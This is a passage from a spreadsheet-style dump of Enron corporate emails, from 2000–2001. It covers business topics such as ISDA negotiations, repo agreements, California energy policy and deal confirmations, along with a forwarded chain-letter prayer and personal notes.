&gt; &gt; &gt; Keep me safe from all danger and harm. Let me start_x000D_
&gt; &gt; &gt; this day with a new attitude and plenty of_x000D_
&gt; &gt; &gt; gratitude._x000D_
&gt; &gt; &gt; Let me make the best of each and every day and give_x000D_
&gt; &gt; &gt; my best in all that is put before me. Clear my mind_x000D_
&gt; &gt; &gt; that I can hear from You. Broaden my mind that I can_x000D_
&gt; &gt; &gt; accept all things. Let me not whine and whimper over_x000D_
&gt; &gt; &gt; things I have no control over. Let me continue to_x000D_
&gt; &gt; &gt; see sin through God's eyes and acknowledge it as_x000D_
&gt; &gt; &gt; evil. And when I sin, let me repent, and confess_x000D_
&gt; &gt; &gt; with my mouth my wrongdoing, and receive the_x000D_
&gt; &gt; &gt; forgiveness of God. And when this world closes in on_x000D_
&gt; &gt; &gt; me, let me remember Jesus' example-to slip away and_x000D_
&gt; &gt; &gt; find a quiet place to pray. It's the best response_x000D_
&gt; &gt; &gt; when I'm pushed beyond my limits. I know that when I_x000D_
&gt; &gt; &gt; can't pray, You listen to my heart._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Continue to use me to do Thy Will. Continue to bless_x000D_
&gt; &gt; &gt; me that I may be a blessing to others. Keep me_x000D_
&gt; &gt; &gt; strong that I may help the weak and unsaved. Keep me_x000D_
&gt; &gt; &gt; uplifted that I may have words of encouragement for_x000D_
&gt; &gt; &gt; others._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; I pray for those that are lost and can't find their_x000D_
&gt; &gt; &gt; way._x000D_
&gt; &gt; &gt; I pray for those that are misjudged and_x000D_
&gt; &gt; &gt; misunderstood._x000D_
&gt; &gt; &gt; I pray for those who refuse to share a word from_x000D_
&gt; &gt; &gt; You._x000D_
&gt; &gt; &gt; I pray for those who don't know You intimately._x000D_
&gt; &gt; &gt; I pray for those that will only read this and not_x000D_
&gt; &gt; &gt; speak this aloud in their own lives._x000D_
&gt; &gt; &gt; I pray for those that will delete this without_x000D_
&gt; &gt; &gt; sharing it with others._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; I pray for those that don't believe. (But) I thank_x000D_
&gt; &gt; &gt; you that I believe. I believe that God changes_x000D_
&gt; &gt; &gt; people and God changes things._x000D_
&gt; &gt; &gt; I pray for all my sisters and brothers. For each and_x000D_
&gt; &gt; &gt; every family member in their households._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; I pray for peace, love and joy in their homes, that_x000D_
&gt; &gt; &gt; they are out of debt &amp; all their needs are met._x000D_
&gt; &gt; &gt; I pray that every eye that reads this knows there is_x000D_
&gt; &gt; &gt; no problem, circumstance, or situation greater than_x000D_
&gt; &gt; &gt; God. Every Battle is in His hands for Him to fight._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; I pray that these words be received into the hearts_x000D_
&gt; &gt; &gt; of every eye that sees them and every mouth that_x000D_
&gt; &gt; &gt; confesses them willingly._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; This is my prayer. In Jesus Name, Amen._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; If you are one of the people who stand in agreement_x000D_
&gt; &gt; &gt; with this prayer and prayed this prayer change the_x000D_
&gt; &gt; &gt; number in the subject box before forwarding the_x000D_
&gt; &gt; &gt; message so people can SEE how many people have done_x000D_
&gt; &gt; &gt; so._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; ___________________________________________________x000D_
&gt; &gt; Do You Yahoo!?_x000D_
&gt; &gt; Kick off your party with Yahoo! Invites._x000D_
&gt; &gt; http://invites.yahoo.com/_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 Aug 2000 10:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.mason@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'ken.powers@enron.com', 'dave.neubauer@enron.com', 'frank.oldenhuis@enron.com', 'larry.swett@enron.com', 'loren.penkava@enron.com', 'john.dushinske@enron.com', 'steve.gilbert@enron.com', 'vernon.mercaldo@enron.com', 'chuck.wilkinson@enron.com', 'rockey.storie@enron.com', 'craig.buehler@enron.com', 'laura.lantefield@enron.com', 'rosemary.gracey@enron.com', 'steve.kirk@enron.com', 'bob.stevens@enron.com', 'jim.wiltfong@enron.com', 'tony.perry@enron.com', 'connie.hook@enron.com', 'kent.miller@enron.com', 'mike.barry@enron.com', 'kay.threet@enron.com', 'michael.bodnar@enron.com', 'tk.lohman@enron.com', 'lisa.valley@enron.com', 'jeff.nielsen@enron.com', 'kevin.hyatt@enron.com', 'audrey.robertson@enron.com', 'tim.johanson@enron.com', 'allen.cohrs@enron.com', 'frank.semin@enron.com', 'miriam.martinez@enron.com', 'penny.mccarran@enron.com', 'jo.williams@enron.com', 'martha.janousek@enron.com', 'robert.mason@enron.com', 'ray.stelly@enron.com', 'christine.stokes@enron.com', 'neal.shaw@enron.com', 'sean.bolks@enron.com', 'larry.pavlou@enron.com', 'pilar.ramirez@enron.com', 'dana.jones@enron.com', 'janet.bowers@enron.com', 'bob.burleson@enron.com', 'eileen.peebles@enron.com', 'lee.ferrell@enron.com', 'david.badura@enron.com', 'john.fiscus@enron.com', 'tracy.schwartzkopf@enron.com', 'kimberly.watson@enron.com', 'reyna.cabrera@enron.com', 'stephen.herber@enron.com', 'john.williams@enron.com', 'sue.neville@enron.com', 'steven.harris@enron.com', 'morgan.gottsponer@enron.com', 'don.powell@enron.com', 'steve.weller@enron.com', 'deb.cappiello@enron.com', 'lorraine.lindberg@enron.com', 'bill.mangels@enron.com', 'lindy.donoho@enron.com', 'michael.stage@enron.com', 'linda.wehring@enron.com', 'chris.sebesta@enron.com', 'jeffery.fawcett@enron.com', 'michelle.lokay@enron.com', 'mark.ferguson@enron.com', 'karen.lagerstrom@enron.com', 'bill.fowler@enron.com', 'john.ayres@enron.com', 'joni.bollinger@enron.com', 'chau-ye.wu@enron.com'})</t>
  </si>
  <si>
    <t>Dashboard Enhancements</t>
  </si>
  <si>
    <t>In our continuing effort to expand the Dashboard, the following items have _x000D_
been added: _x000D_
_x000D_
New Categories for your personalized portal window: _x000D_
_x000D_
New categories have been added for each group in ET&amp;S Business Development _x000D_
and Marketing.  This gives each group the ability to post/publish their _x000D_
information on the dashboard for viewing.  These new categories are listed _x000D_
below:_x000D_
_x000D_
? Storage Services_x000D_
? Risk Mgmt &amp; Report  _x000D_
? Pricing &amp; Structuring_x000D_
? North Power Bus Dev_x000D_
? South Power Bus Dev_x000D_
? Offshore Bus Dev_x000D_
? North LDC Team_x000D_
? Central LDC Team_x000D_
? Marketing Analysis_x000D_
? Information Services_x000D_
_x000D_
To add these new categories to your dashboard simply click on the personalize _x000D_
button, highlight the new available category in Pane 1 (left), Pane 2 _x000D_
(center), or Pane 3 (right) and click on the add button.  This action will _x000D_
move this category from available to the bottom of the selected categories.  _x000D_
If you would like to change the order within a pane you click on the selected _x000D_
category then move it up or down using the arrows to the right of the _x000D_
selected categories pane.  You then click save to exit the personalize screen _x000D_
and return to the dashboard._x000D_
_x000D_
If you have any problems or questions please contact Bobby Mason @ (713) _x000D_
853-5196 or Martha Janousek @ (713) 853-7275.</t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 15:16:16 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'pinto.leite@enron.com', 'harlan.murphy@enron.com', 'e-mail &lt;.lech@enron.com&gt;', 'peter.del@enron.com', 'brent.hendry@enron.com', 't..hodge@enron.com', 'tanya.rohauer@enron.com', 'e-mail &lt;.rick@enron.com&gt;', 'peter.keohane@enron.com', 'steve.van@enron.com', 'elizabeth.sager@enron.com', 'e-mail &lt;.marissa@enron.com&gt;', 'n..gray@enron.com', 'paul.simons@enron.com', 'morris.clark@enron.com', 'angela.davis@enron.com', 'john.viverito@enron.com', 'e-mail &lt;.david@enron.com&gt;', 'chris.gaffney@enron.com', 'gerald.nemec@enron.com', 'carol.st.@enron.com', 'sara.shackleton@enron.com', 'greg.johnston@enron.com', 'marcus.von@enron.com', 'michael.schuh@enron.com', 'h..douglas@enron.com', 'frank.sayre@enron.com', 'marie.heard@enron.com', 'c..koehler@enron.com', 'tana.jones@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'e-mail &lt;.athena@enron.com&gt;', 'rahul.saxena@enron.com', 'alan.aronowitz@enron.com', 'lisa.mellencamp@enron.com', 'credit &lt;.williams@enron.com&gt;', 'mary.cook@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the updated list of master netting agreement assignments._x000D_
_x000D_
_x000D_
_x000D_
		 </t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 03:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Susan's expense report 11/16/00</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not sure whether or not the expense report below has already been _x000D_
processed.  If it hasn't, please process.  If it has, please disregard this _x000D_
e-mail.  Thanks very much!_x000D_
_x000D_
---------------------- Forwarded by Denise LaGesse/ET&amp;S/Enron on 12/05/2000 _x000D_
11:48 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Drew Fossum                           12/05/2000 11:43 AM_x000D_
	_x000D_
_x000D_
To: Denise LaGesse/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Susan's expense report 11/16/00  _x000D_
_x000D_
Yes.  Sorry I forgot to cc you.  If it got lost in the process, have them _x000D_
send it again, or forward this email to payables as my approval.  thanks df_x000D_
_x000D_
_x000D_
_x000D_
DENISE LAGESSE_x000D_
12/05/2000 10:51 AM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc: Susan Scott/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Susan's expense report 11/16/00_x000D_
_x000D_
Drew,_x000D_
_x000D_
Did you already approve this expense report and send it to accounting?_x000D_
_x000D_
Denise_x000D_
_x000D_
---------------------- Forwarded by Denise LaGesse/ET&amp;S/Enron on 12/05/2000 _x000D_
10:50 AM ---------------------------_x000D_
_x000D_
_x000D_
DENISE LAGESSE_x000D_
11/16/2000 04:04 PM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc: Susan Scott/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Susan's expense report 11/16/00_x000D_
_x000D_
Please approve the attached expense report and cc: me on your approval.  _x000D_
Thanks!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Jun 2000 12:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Project for Bill</t>
  </si>
  <si>
    <t>I have another project for Bill I'd like for you to work on while I'm in _x000D_
Gillette.  Remember the deal with Dominion?  They let some saltwater get into _x000D_
our system and it cost boo-coos of money to fix and we are recouping those _x000D_
monies from their gas contract?  Well, there hasn't been any production at _x000D_
that meter for about 6 months and so there is nothing to offset against.  I'm _x000D_
leaving in your chair Gerald Lofton's schedule of monies still owed.  _x000D_
_x000D_
Would you get Bill up to speed on the facts (I think you still may have the _x000D_
file) and have him draft a demand letter for the balance of the monies owed?_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 04:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Thanks</t>
  </si>
  <si>
    <t>Thanks for email.  will listen to the whole of it later today.  running_x000D_
between meetings.  sorry!  mckinsey to be calling you._x000D_
_x000D_
attached is bio._x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeff.Dasovich@enron.com [mailto:Jeff.Dasovich@enron.com]_x000D_
Sent: Friday, March 02, 2001 4:07 PM_x000D_
To: kari.dohn@gov.ca.gov_x000D_
Subject: Thanks_x000D_
_x000D_
_x000D_
Thanks again for taking the time to meet.  We're very interested in_x000D_
following up on the demand buy-down/energy efficiency issues and are glad_x000D_
to assist if we can--and we think we can._x000D_
_x000D_
As I mentioned, I've attached the final version of the document we've been_x000D_
distributing in Sacramento describing our proposed solution to California's_x000D_
energy crisis. If you have any questions about it, or want to discuss it_x000D_
further, just let me know._x000D_
_x000D_
Also attached is the letter we sent to the PUC supporting Comm'r Bilas'_x000D_
alternative decision designed to 1) make CDWR a creditworthy entity and 2)_x000D_
permit the Legislature to continue its work on a "Direct Access" fix_x000D_
without interference from the PUC. It's critical that the PUC adopt the_x000D_
Bilas decision as soon as possible._x000D_
_x000D_
In addition, I'm including a story regarding the EOB/ISO filing at FERC_x000D_
alleging price gouging and demanding refunds.  As we discussed, it's_x000D_
creating a good deal of consternation in the market._x000D_
_x000D_
Finally, we'd be very interested meeting with you and the folks from_x000D_
McKinsey on our reverse-auction for demand reductions._x000D_
_x000D_
Have a nice weekend.  Look forward to talking again very soon._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
(See attached file: Hertzberg final.doc) (See attached file: Comments on_x000D_
Bilas Alternate.DOC)_x000D_
_x000D_
_x000D_
_x000D_
POWER POINTS: How To Raise Electricity Prices, ISO-Style_x000D_
   By Mark Golden_x000D_
   A Dow Jones Newswires Column_x000D_
_x000D_
  NEW YORK (Dow Jones)--There they go again. The California Independent_x000D_
System Operator has initiated another attempt to suppress wholesale_x000D_
electricity_x000D_
prices rather than deal with the fundamental reasons of why prices are_x000D_
high._x000D_
  Like past anti-market moves, Thursday's request that the Federal Energy_x000D_
Regulatory Commission slash suppliers' unpaid invoices for December and_x000D_
January power will fail in its stated aim. Also as with past attempts, the_x000D_
ISO's_x000D_
action this week will likely result in higher costs for Edison_x000D_
International (EIX)_x000D_
unit Southern California Edison, PG&amp;E Corp. (PCG) unit Pacific Gas &amp;_x000D_
Electric,_x000D_
Sempra Energy (SRE) unit San Diego Gas &amp; Electric Co. and the state's_x000D_
Department of_x000D_
Water Resources._x000D_
  The ISO, which is responsible for maintaining the balance of power supply_x000D_
and demand on most of the state's power grid, has suffered the unintended_x000D_
consequences of its actions many times before. When the ISO passed a_x000D_
$250/MWh price cap in the summer, the cap became a target and caused prices_x000D_
to rise,_x000D_
just as the ISO had been warned it would. When the ISO exercised its_x000D_
ability to_x000D_
buy power above its cap only from out-of-state utilities, California_x000D_
generators_x000D_
sold power to the out-of-state utilities, which in turn sold the power back_x000D_
to_x000D_
California at a markup._x000D_
  The latest attempt to suppress the market is mind-numbingly stupid. The_x000D_
ISO wants the FERC to order retroactive discounts for power it says was_x000D_
sold at_x000D_
unreasonably high prices. Merchant generators, other western utilities and_x000D_
power marketers sold about $3 billion worth of bulk power to the ISO in_x000D_
December_x000D_
and January. The ISO says overcharging accounts for $560 million of that_x000D_
total._x000D_
Suppliers' prices, which the ISO agreed to pay at the time, exceeded_x000D_
hypothetical generating costs by more than 10% and are therefore_x000D_
unreasonable,the grid manager says._x000D_
  Actual refunds might greatly exceed $560 million, according to the ISO,_x000D_
once the FERC looks at the suppliers' actual costs. Power from a generating_x000D_
company that bought natural gas before the spot market ran up, for example,_x000D_
should_x000D_
be discounted the most. Generators that waited and paid the most for gas_x000D_
would_x000D_
make the bigger profit per megawatt hour. What a great idea: punish the_x000D_
smart and_x000D_
reward the stupid._x000D_
  Staffers lead by Anjali Sheffrin, the ISO's director of market analysis,_x000D_
and Eric Hildebrandt, manager of market monitoring, spent a fair amount of_x000D_
time_x000D_
and money to establish this shocker: In a supply-short commodity market,_x000D_
prices_x000D_
exceed producers' costs._x000D_
  Where they vary from well-established economic principles is that they_x000D_
find this "unreasonable."_x000D_
  Sheffrin and Hildebrandt want the FERC to obtain extensive cost data from_x000D_
all suppliers - including government-owned utilities Los Angeles Department_x000D_
of_x000D_
Water &amp; Power and Canada's BC Hydro - and begin hearings on refunds. This_x000D_
would_x000D_
cover the vast majority of sales to the ISO during December and January_x000D_
because_x000D_
almost every seller to the ISO exceeded the $150 per megawatt-hour "soft"_x000D_
price_x000D_
cap, above which transactions must be reported to the FERC for possible_x000D_
review._x000D_
  There is no question the ISO has been paying prices that exceed even the_x000D_
already high market prices. On Tuesday, for example, the ISO paid an_x000D_
average_x000D_
price of $337/MWh for power that other western utilities had bought and_x000D_
sold_x000D_
for $175-$200/MWh. On that one day, the ISO paid almost $25 million for_x000D_
power_x000D_
that was worth about $14 million._x000D_
  The reason: The ISO has had to pay a premium to the rest of the market_x000D_
since the middle of December, when suppliers correctly figured out that the_x000D_
utilities were running out of cash and wouldn't be able to pay their ISO_x000D_
bills. Once_x000D_
northwestern utilities stopped selling to the ISO at any price, the ISO_x000D_
asked some of the in-state generating companies like Williams Cos. (WMB) to_x000D_
step_x000D_
into the middle on its behalf. Williams did so for what it has called a_x000D_
reasonable profit._x000D_
  Let's say that Williams bought from some other generator at $450/MWh and_x000D_
sold to the ISO at $500/MWh. That would be reasonable based on Williams'_x000D_
costs,_x000D_
according to the ISO's view._x000D_
  But if the generator sold directly to the ISO in the first place at_x000D_
$450/MWh,it would be ordered to provide a refund, because its generating_x000D_
costs are_x000D_
assuredly nowhere near $450/MWh._x000D_
  So, according to the ISO, $500/MWh is reasonable, but $450/MWh is too_x000D_
high._x000D_
  If the FERC were to order refunds as the ISO has requested, no company_x000D_
that generates power would ever again sell to the ISO. It would always sell_x000D_
to_x000D_
some third party, which in turn would sell the electricity to the ISO at a_x000D_
markup._x000D_
  Does the ISO ever stop and think through the impact of what it tries to_x000D_
do?_x000D_
  "We certainly recognize that's a problem, and it's something FERC needs_x000D_
to_x000D_
grapple with," Hildebrandt said in an interview._x000D_
  What the FERC will do is save the ISO from itself. "We reject proposals_x000D_
to_x000D_
return to cost-based regulation," the FERC said in its Dec. 15 California_x000D_
ruling._x000D_
  The FERC will review some of the high prices, as required. But refunds_x000D_
will be ordered only if the FERC finds that a particular seller to_x000D_
California - or a_x000D_
colluding group of sellers - withheld supplies in order to increase prices,_x000D_
according to the FERC ruling._x000D_
  But collusion won't likely be found. There have been many investigations_x000D_
into whether sellers have created a "false scarcity." None have found it._x000D_
  In December, Republican FERC Commissioner Curt Hebert, now chairman,_x000D_
applauded the commission's decision to "reserve 'price mitigation' for real_x000D_
exercises_x000D_
of market power rather than focusing on the price level itself."_x000D_
  The issue of the ISO and utilities having to pay a credit-risk premium_x000D_
arose after the FERC had decided what it would do about California. But,_x000D_
according_x000D_
to a source knowledgeable about FERC operations under Hebert's leadership,_x000D_
the_x000D_
commission will recognize the credit-risk premium as reasonable._x000D_
  In the meantime, however, the specter of retroactive price controls and_x000D_
the increased hassle of dealing with the ISO makes suppliers even more_x000D_
reluctant_x000D_
to sell to the ISO. The ISO will have to overcome that reluctance by_x000D_
offering_x000D_
to pay an even higher premium._x000D_
  Good move._x000D_
  -By Mark Golden, Dow Jones Newswires; 201-938-4604;_x000D_
mark.golden@dowjones.com_x000D_
_x000D_
  (END) Dow Jones Newswires 02-03-01_x000D_
  1844GMT(AP-DJ-03-02-01 1844GMT)_x000D_
_x000D_
_x000D_
 - Kari's bio.doc</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 01:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Sara,_x000D_
_x000D_
Can you please provide your findings on the following items:_x000D_
_x000D_
1. Determine with Cheryl that ECI is in fact authorized to transact Repos_x000D_
_x000D_
2. How robust the Goldman Repo agreements are, and their sutability to ECI._x000D_
_x000D_
3. An estimate on how long it will take to set up the Goldman Repo Agreements _x000D_
in ECI's name._x000D_
_x000D_
_x000D_
Can you please also provide any ideas how ECI or ECL could transact a Repo _x000D_
trade today using existing documentation._x000D_
_x000D_
_x000D_
London has indicated an urgent need to carry out these transactions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Tom  </t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 02:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ps5@andrew.cmu.edu'})</t>
  </si>
  <si>
    <t>Re: MSCF Speaker Series</t>
  </si>
  <si>
    <t xml:space="preserve">Pierre,_x000D_
_x000D_
I am working with Kristin Gandy on my trip. Hopefully, she will be able to _x000D_
confirm the _x000D_
November date in a day or two. Kristin  is taking care of all the _x000D_
arrangements._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Pierre-Philippe Ste-Marie &lt;ps5@andrew.cmu.edu&gt; on 08/28/2000 09:34:47 AM_x000D_
To: Vince.J.Kaminski@Enron.com_x000D_
cc:  _x000D_
Subject: MSCF Speaker Series_x000D_
_x000D_
_x000D_
Dear Mr. Kaminski,_x000D_
_x000D_
_x000D_
Any news yet about your trip to Pittsburgh? I would sure appreciate a_x000D_
message saying that everything is Ok for early november!!_x000D_
_x000D_
Pierre_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 06:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Intellectual Property Insurance Coverage Info and Application</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,_x000D_
_x000D_
Attached is some cusory information and related news article on insurance _x000D_
coverage currently being touted in the market  for IP risks.  Coverage is _x000D_
avaialable for both offensive (enforcement) and defensive actions._x000D_
_x000D_
If you're interested in exploring specific applications for Enron Networks, _x000D_
I'm happy to arrange a meeting with the underwriter.  Jsut let me know._x000D_
_x000D_
Thanks,_x000D_
David Marshall_x000D_
3-6847_x000D_
_x000D_
_x000D_
_x000D_
 - IParticle.PDF_x000D_
 - App2 - Defensive.pdf_x000D_
 - IP Defense &amp; Pursuit Summary.pdf_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 00:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: 9-18-00 Checkout</t>
  </si>
  <si>
    <t>Deal has been changed to reflect this.  Thank you</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 00:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Deal #471740 Mieco</t>
  </si>
  <si>
    <t>She didn't "warn" me that you were cheesy, but she did mention you were a _x000D_
peach too! And anyway, I love cheesy e-mails._x000D_
_x000D_
But since I'm writing, I might as well mention that I have a deal that was _x000D_
changed last night by one of our traders, and I think it needs to be _x000D_
re-confirmed. It's deal number 476435 - Mark Fischer caught his own error and _x000D_
changed the delivery point from Palo Verde to Mid-C. _x000D_
_x000D_
And speaking of confirms and all that good stuff, that's one area I was never _x000D_
really told about; so if you or anyone else in your group has any information _x000D_
to share - anything that I could do to make your jobs easier or to make our _x000D_
jobs synchronize better - PLEASE let me know. I'm very humble about how much _x000D_
I have to learn, so the more people teach me, the better._x000D_
_x000D_
I believe I'll be coming down to Houston after the new year to meet people, _x000D_
tour the place, and get a suntan! So if you don't want to call or e-mail with _x000D_
every detail, you can compile them all and give me the run-down when I'm _x000D_
there. Whatever works for you guys - just let me know._x000D_
_x000D_
Thanks a lot,_x000D_
Kate</t>
  </si>
  <si>
    <t>Sun, 15 Apr 2001 11:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>PNM parking for Monday</t>
  </si>
  <si>
    <t>We have parking with PNM for off-peak on Monday.  The energy schedule is as _x000D_
follows.  The energy is at 4C but you should be able to move it to PV with _x000D_
PNM if you ask nicely.  We will split the upside over $35 with ST SW via _x000D_
annuity.  Please make all transmission purchases or other sales under their _x000D_
book.  _x000D_
_x000D_
Deal number on the buy from PNM is #581199._x000D_
_x000D_
The shape of this length is:_x000D_
_x000D_
HE1 50_x000D_
HE2 50_x000D_
HE3 50_x000D_
HE4 50_x000D_
HE5 45_x000D_
HE6 20_x000D_
HE23 35_x000D_
HE24 50_x000D_
_x000D_
Day total is 350._x000D_
_x000D_
Thanks_x000D_
Bill</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 05:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.m.spielman@db.com'})</t>
  </si>
  <si>
    <t>ISDA AGM</t>
  </si>
  <si>
    <t>Any chance you're attending again this year?  It would be nice to catch up.</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 03:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cgribblego@hotmail.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Okay, did you email Katie and tell her we hung out last night because _x000D_
remarkably she emailed me this morning asking me how I was doing and how my _x000D_
family is.  It just seemed to coincidental.  I dont care if you did I was _x000D_
just curious. </t>
  </si>
  <si>
    <t>Thu, 29 Jun 2000 10:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jim.fallon@enron.com', 'ravi.thuraisingham@enron.com', 'celeste.roberts@enron.com'})</t>
  </si>
  <si>
    <t>Shalesh</t>
  </si>
  <si>
    <t>Jim,_x000D_
_x000D_
Clarification regarding Shalesh' transfer to EBS._x000D_
_x000D_
The request to rotate Shalesh out of Research into EBS_x000D_
came from Ravi Thuraisingham. My understanding was that it was_x000D_
fully coordinated with you and I was more than happy to oblige._x000D_
_x000D_
Shalesh is concerned that his integrity is being questioned and I can assure_x000D_
you that he was not the instigator of the move._x000D_
_x000D_
My impression is that Shalesh is doing a very good job and Ravi is very happy_x000D_
him. I shall be glad to keep him in the Research Group in his current role._x000D_
_x000D_
Have a good 4th of July._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 10:05:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gross@quadraenergy.com'})</t>
  </si>
  <si>
    <t>Mr. Ross,_x000D_
I am checking with Nidia Mendoza and we will respond to you shortly._x000D_
_x000D_
Stephanie Panus_x000D_
Senior Legal Specialist_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3803C_x000D_
Houston, Texas  77002_x000D_
ph:  713.345.3249_x000D_
fax:  713.646.3490_x000D_
email:  stephanie.panus@enron.com_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Gary Ross &lt;GRoss@Quadraenergy.com&gt;@ENRON  _x000D_
Sent:	Monday, October 15, 2001 3:59 PM_x000D_
To:	Panus, Stephanie_x000D_
Cc:	Patrick J. Loftus; Scott Simpson_x000D_
Subject:	RE: ISDA Master Agreement_x000D_
_x000D_
Ms. Panus,_x000D_
_x000D_
A number of months ago you had sent me a draft Master Agreement and Credit_x000D_
Support Annex.  I had then spoke with Nidia Mendoza, in the Enron Credit_x000D_
department, regarding the changes we would like to see in the agreement._x000D_
However, I am having problems getting her to respond to my phone messages or_x000D_
e-mails._x000D_
_x000D_
I am hoping I could detail the changes we have and  you could then let me_x000D_
know if they are acceptable._x000D_
_x000D_
They are as follows:_x000D_
_x000D_
Ms. Mendoza faxed me an alternate Letter of Credit format, which our Bank_x000D_
finds more acceptable than SCHEDULE 1 to EXHIBIT A to paragraph 13 of Annex_x000D_
A._x000D_
_x000D_
We would like to have this format replace the current SCHEDULE 1 or have it_x000D_
added as SCHEDULE 2. This will guard against the format being disallowed at_x000D_
a latter date._x000D_
_x000D_
Also, we would like to have the dollar amounts in point (b) (iv) (D) of_x000D_
PARAGRAPH 13 to the ISDA CREDIT SUPPORT ANNEX reduced from $250,000 to_x000D_
$10,000.  A $250,000 threshold is a very large number especially when you_x000D_
consider that we would not be paid any interest, while Enron held any excess_x000D_
funds. Also, the $10,000 amount is typical of the amount we use with other_x000D_
trading houses of Enron's size._x000D_
_x000D_
Please let me know your thoughts on the above items. If you have any_x000D_
questions please contact me, at (403) 215-7451._x000D_
_x000D_
Thank you_x000D_
_x000D_
Gary Ross_x000D_
_x000D_
-----Original Message-----_x000D_
From: Panus, Stephanie [mailto:Stephanie.Panus@ENRON.com]_x000D_
Sent: Wednesday, July 25, 2001 3:54 PM_x000D_
To: gross@quadraenergy.com_x000D_
Cc: Reves, Brant_x000D_
Subject: ISDA Master Agreement_x000D_
_x000D_
_x000D_
Mr. Ross,_x000D_
_x000D_
Attached for your review is a draft of the ISDA Master Agreement between_x000D_
Enron North America Corp. and Quadra Energy Trading Ltd.  Please note_x000D_
that the actual Master Agreement and Credit Support Annex are preprinted_x000D_
forms from ISDA and cannot be sent electronically.  Therefore, I am also_x000D_
sending you the entire package via overnight delivery._x000D_
_x000D_
If you have any questions, please call me at the below number or Brent_x000D_
Hendry, Senior Counsel, at 713-853-7124.  We look forward to hearing_x000D_
your comments._x000D_
_x000D_
 &lt;&lt;163ctr(quadra).doc&gt;&gt;_x000D_
_x000D_
Stephanie Panus_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB3803C_x000D_
Houston, Texas  77002_x000D_
ph:  713.345.3249_x000D_
fax:  713.646.3490_x000D_
email:  stephanie.panus@enron.com</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 13:45:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'groyer@cmta.net'})</t>
  </si>
  <si>
    <t>Employment Training Funds Available</t>
  </si>
  <si>
    <t>To:         CMTA Members_x000D_
_x000D_
From:     Brian McMahon_x000D_
_x000D_
Date:      October 2, 2001_x000D_
_x000D_
Re:         Employment Training Funds Available to CMTA Members_x000D_
_x000D_
2001 has been a trying year for many of our members.  The national_x000D_
economic slowdown has been compounded here in the state as a result of_x000D_
energy issues and 'California-only' mandates on employers._x000D_
_x000D_
One way CMTA is helping companies offset the state's high cost of doing_x000D_
business is by offering a free program to help acquire state funds for_x000D_
their employment training needs._x000D_
_x000D_
Please take a moment to go to our ETP program webpage at_x000D_
